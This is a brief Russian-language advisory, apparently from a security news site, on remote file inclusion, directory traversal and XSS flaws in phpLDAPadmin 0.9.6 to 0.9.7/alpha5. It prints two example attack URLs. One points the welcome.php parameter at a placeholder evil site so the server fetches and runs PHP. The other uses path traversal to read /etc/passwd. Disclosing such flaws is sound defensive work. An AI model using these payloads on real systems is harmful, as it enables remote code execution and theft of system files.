Программа: phpLDAPadmin 0.9.6 — 0.9.7/alpha5 

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.
Уязвимость позволяет удаленному пользователю с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. 

Пример:

http://[target]/[path]/phpldapadmin/welcome.php? custom_welcome_page=http ://[evil_site]/cmd.gif

Удаленный пользователь может просмотреть произвольные файлы на системе с помощью символов обхода каталога.

Пример:

http://[target]/[path]/phpldapadmin/welcome.php? custom_welcome_page=../../../../../../../../etc/passwd 

Удаленный пользователь может также выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Оставить мнение

Check Also

Что можно сделать с iPhone, зная пасскод. Как сливают данные, уводят iCloud и блокируют остальные устройства

Последние несколько месяцев мы много писали о нововведениях в iOS 11. «Теперь-то заживем!»…